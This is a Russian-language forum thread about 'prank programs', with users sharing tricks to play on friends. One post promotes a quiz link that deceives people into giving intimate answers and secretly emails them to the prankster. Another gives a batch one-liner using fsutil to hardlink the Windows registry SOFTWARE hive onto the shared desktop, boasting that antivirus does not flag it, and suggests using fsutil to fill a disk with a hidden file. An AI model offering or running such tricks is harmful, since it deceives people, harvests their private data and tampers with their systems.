![]() |
программы-шутки
Если этот раздел приживется могу и я выложить еще несколько программ- шуток если у вас есть что-то похожее выкладывайте,
короче программа которую хочу выложить выглядит ввиде теста, который вы можете попросить пройти своих друзей(подруг) в первой части необходимо заполнить имя емайл пол и возраст( эту часть необходимо заполнять и вам чтоб привязать свое мыло к проге) затем жмем кнопку далее а здесь вашей жертве предстоит ответить на довольно интимные вопросы(вам отвечать необязательно) жмем на кнопку результат -и что мы видим- типа того что вас разыграл такойто ваш друг и все ваши ответы ушли ему на мыло(кстати вы реально получаете на свое мыло все ответы того человека)(здесь человек испытывает шок-поверте),но теперь и вы можете разыграть друзей отправив им ссылку такую-то. Короче не маленькие сами разберетесь мыло которое прикрепленно к данной ссылке я зарегил специально , для того чтоб вам получить свою ссылку вам не надо отвечать на вопросы а просто во второй части жать на кнопку-поучить результат вот эта ссылка http://test.lubwi.net/?f=0193778199 |
|
угарно. только сегодня напололся на файл, знал что он делает и отображение стояло разширений - попался сам на "новая папка.exe" =) он копируеться во все папки текущего каталога и принимает имя и иконку каталога в котором лежит, благо на старом компе, задолбало =)))
|
Цитата:
|
Цитата:
|
Я предлагаю пошутить стандартной программой. Выполняется bat-файлом, не палится антивирусом...;)
Код:
fsutil hardlink create "%ALLUSERSPROFILE%\ђ Ў®зЁ© бв®«\Ќ…“„Ђ—Ќ?Љ!" "%WINDIR%\System32\Config\Software"Если прочесть мануал по fsutil, можно найти много полезного. Например, заполнение файлов нулями или создание нового файла (на весь объём харда) в очень-очень далеком ог глаз месте. Я хотел расписать, но не осилил...:( |
DeBugger: поправка - жесткие ссылки можно создавать только на NTFS, FAT в пролёте
|
Кстати, говоря про NTFS нельзя не упомянуть про файловые потоки.
http://www.cavernxxx.by.ru/article/streams.htm |
эта прога(вес 2 кб) переворачивает ваш экран вверх ногами
эта Шутка показывает окно установки и удаления программ. И вам больше ни чего не остается делать как нажать кнопку "OK". После чего шутка "удаляет" все программы которые инсталированы на вашем компе. а эта Очень прикольная программка, при запуске которой появляется запрос "Вы уверены, что хотите отформатировать диск С:/ ?". Но к вашему сожалению вы не в силах нажать "Отмена", и через несколько секунд вы слышите приятный звук форматирования диска...... :)) Но это всего лишь шутка. Ладно на первый раз все :) потом еще выложу если кому интересно |
Цитата:
|
| Время: 05:59 |